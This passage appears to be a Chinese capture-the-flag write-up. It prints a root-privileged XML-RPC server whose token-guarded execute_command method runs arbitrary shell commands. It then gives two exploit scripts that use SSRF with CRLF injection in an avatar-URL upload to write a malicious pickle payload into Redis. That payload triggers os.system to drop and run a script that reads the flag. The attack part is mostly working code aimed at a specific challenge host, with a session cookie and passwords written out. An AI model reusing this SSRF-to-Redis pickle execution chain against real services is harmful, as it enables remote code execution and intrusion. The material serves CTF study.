173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
#!/usr/bin/env python3
import sys
import os
import subprocess
import json
import platform
import threading
import time
import functools
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCDispatcher
import logging

# 设置日志
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('MCP-Secure-Server')

class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)

class SecureXMLRPCServer(SimpleXMLRPCServer):

def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._introspection_enabled = False

def system_listMethods(self):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodSignature(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodHelp(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def _dispatch(self, method, params):
if method.startswith('system.'):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

try:
return super()._dispatch(method, params)
except Fault as e:
raise Fault(403, "Authentication failed")
except Exception:
raise

class MCPServerSecure:

def __init__(self, host='0.0.0.0', port=54321):
self.host = host
self.port = port
self.server = SecureXMLRPCServer((host, port),
requestHandler=RequestHandler,
allow_none=True,
logRequests=False)

self.auth_token = "mcp_secure_token_b2rglxd"

self.register_methods()

logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}")
logger.info(f"认证令牌: {self.auth_token}")
logger.info(f"服务启动完成,进程ID: {os.getpid()}")

def verify_token(self, token):
"""验证令牌"""
return token == self.auth_token

def _auth_required(self, func):
"""认证装饰器"""
@functools.wraps(func)
def wrapper(token, *args, **kwargs):
if not self.verify_token(token):
return {'error': 'Authentication failed. Invalid token.'}
return func(*args, **kwargs)
return wrapper

def register_methods(self):
"""注册所有需要认证的RPC方法"""
# 所有方法都要求token作为第一个参数
self.server.register_function(
self._auth_required(self.get_server_info),
'get_server_info'
)
self.server.register_function(
self._auth_required(self.get_system_status),
'get_system_status'
)
self.server.register_function(
self._auth_required(self.list_files),
'list_files'
)
self.server.register_function(
self._auth_required(self.read_file),
'read_file'
)
self.server.register_function(
self._auth_required(self.execute_command),
'execute_command'
)
self.server.register_function(
self._auth_required(self.get_process_list),
'get_process_list'
)
self.server.register_function(
self._auth_required(self.service_control),
'service_control'
)

# ========== MCP 服务方法 ==========
def get_server_info(self):
"""获取MCP服务器信息"""
return {
'service': 'Secure Management Control Protocol Server',
'version': '2.0.0',
'host': self.host,
'port': self.port,
'elevated_privileges': os.geteuid() == 0,
'pid': os.getpid(),
'secure': True,
'auth_required': 'ALL_METHODS'
}

def get_system_status(self):
"""获取系统状态信息"""
try:
# CPU使用率
with open('/proc/loadavg', 'r') as f:
loadavg = f.read().strip()

# 内存信息
mem_info = {}
with open('/proc/meminfo', 'r') as f:
for line in f:
if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line:
key, value = line.split(':')
mem_info[key.strip()] = value.strip()

# 磁盘空间
disk_info = {}
try:
df_output = subprocess.check_output(['df', '-h', '/'],
stderr=subprocess.DEVNULL,
text=True)
lines = df_output.strip().split('\n')
if len(lines) > 1:
parts = lines[1].split()
if len(parts) >= 6:
disk_info = {
'filesystem': parts[0],
'size': parts[1],
'used': parts[2],
'available': parts[3],
'use_percent': parts[4],
'mounted': parts[5]
}
except:
disk_info = {'error': 'Unable to get disk info'}

return {
'system': platform.system(),
'node': platform.node(),
'release': platform.release(),
'version': platform.version(),
'machine': platform.machine(),
'processor': platform.processor(),
'load_average': loadavg,
'memory': mem_info,
'disk': disk_info,
'uptime': self._get_uptime(),
'time': time.strftime('%Y-%m-%d %H:%M:%S')
}
except Exception as e:
return {'error': str(e)}

def _get_uptime(self):
"""获取系统运行时间"""
try:
with open('/proc/uptime', 'r') as f:
uptime_seconds = float(f.readline().split()[0])
days = int(uptime_seconds // 86400)
hours = int((uptime_seconds % 86400) // 3600)
minutes = int((uptime_seconds % 3600) // 60)
return f"{days}d {hours}h {minutes}m"
except:
return "Unknown"

def list_files(self, path='.'):
"""列出指定目录下的文件和目录"""
try:
if '..' in path or path.startswith('/'):
sensitive_dirs = ['/etc', '/root', '/home', '/var']
for sensitive in sensitive_dirs:
if path.startswith(sensitive) and not path.startswith('/opt/mcp_service'):
return {'error': 'Access to sensitive directory restricted'}

files = []
for item in os.listdir(path):
item_path = os.path.join(path, item)
stat = os.stat(item_path)
files.append({
'name': item,
'path': item_path,
'is_dir': os.path.isdir(item_path),
'size': stat.st_size,
'modified': time.ctime(stat.st_mtime),
'permissions': oct(stat.st_mode)[-3:]
})
return {'path': path, 'files': files}
except Exception as e:
return {'error': str(e)}

def read_file(self, filepath):
"""读取文件内容"""
try:
if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath:
return {'error': 'Access to sensitive file restricted'}

with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read(5000) # 限制读取大小
return {
'file': filepath,
'content': content,
'truncated': len(content) == 5000
}
except Exception as e:
return {'error': str(e)}

def execute_command(self, command):
"""执行系统命令"""
try:
logger.warning(f"执行命令: {command}")

result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=10
)

return {
'command': command,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr,
'success': result.returncode == 0
}
except subprocess.TimeoutExpired:
return {'error': 'Command execution timeout'}
except Exception as e:
return {'error': str(e)}

def get_process_list(self):
"""获取进程列表"""
try:
processes = []
# 使用ps命令获取进程信息
ps_output = subprocess.check_output(
['ps', 'aux'],
stderr=subprocess.DEVNULL,
text=True
)

lines = ps_output.strip().split('\n')
if len(lines) > 1:
header = lines[0]
for line in lines[1:21]: # 限制返回前20个进程
parts = line.split()
if len(parts) >= 11:
process = {
'user': parts[0],
'pid': parts[1],
'cpu': parts[2],
'mem': parts[3],
'vsz': parts[4],
'rss': parts[5],
'tty': parts[6],
'stat': parts[7],
'start': parts[8],
'time': parts[9],
'command': ' '.join(parts[10:])
}
processes.append(process)

return {'process_count': len(processes), 'processes': processes}
except Exception as e:
return {'error': str(e)}

def service_control(self, service_name, action):
"""控制系统服务(start/stop/restart/status)"""
try:
if action not in ['start', 'stop', 'restart', 'status']:
return {'error': 'Invalid action. Use start/stop/restart/status'}

result = subprocess.run(
['systemctl', action, service_name],
capture_output=True,
text=True,
timeout=10
)

return {
'service': service_name,
'action': action,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr
}
except FileNotFoundError:
return {'error': 'systemctl not available'}
except Exception as e:
return {'error': str(e)}

def run(self):
"""运行MCP服务器"""
logger.info(f"启动安全MCP服务器,监听 {self.host}:{self.port}")
logger.info("所有方法需要认证令牌")
try:
self.server.serve_forever()
except KeyboardInterrupt:
logger.info("收到中断信号,关闭服务器")
finally:
self.server.server_close()
logger.info("MCP服务器已关闭")

def main():
"""主函数"""
# 检查运行权限
if os.geteuid() != 0:
logger.warning("警告:服务未以管理员权限运行,部分功能可能受限")
logger.warning("建议以管理员权限运行以获得完整功能")

# 创建并运行服务器
server = MCPServerSecure(host='0.0.0.0', port=54321)
server.run()

if __name__ == '__main__':
main()

简单审计可以发现,访问http://127.0.0.1:54321/RPC2,携带token: mcp_secure_token_b2rglxd可以以root权限执行系统命令,编写对应客户端:

1
2
3
4
5
#!/usr/bin/env python
import xmlrpc.client
proxy=xmlrpc.client.ServerProxy("http://localhost:54321/RPC2", allow_none=True)
exec_response=proxy.execute_command("mcp_secure_token_b2rglxd", "cat /flag")
print(exec_response)

将python脚本利用命令echobase64组合写入服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'echo IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgeG1scnBjLmNsaWVudA0KcHJveHk9eG1scnBjLmNsaWVudC5TZXJ2ZXJQcm94eSgiaHR0cDovL2xvY2FsaG9zdDo1NDMyMS9SUEMyIiwgYWxsb3dfbm9uZT1UcnVlKQ0KZXhlY19yZXNwb25zZT1wcm94eS5leGVjdXRlX2NvbW1hbmQoIm1jcF9zZWN1cmVfdG9rZW5fYjJyZ2x4ZCIsICJjYXQgL2ZsYWciKQ0KcHJpbnQoZXhlY19yZXNwb25zZSk= | base64 -d > /app/static/3.txt'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
data = base64.b64decode(b64_data).decode("utf-8")
print(data)
except Exception as e:
print(res.text)

再执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'python /app/static/3.txt > /app/static/flag'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
data = base64.b64decode(b64_data).decode("utf-8")
print(data)
except Exception as e:
print(res.text)

访问/static/flag获得flag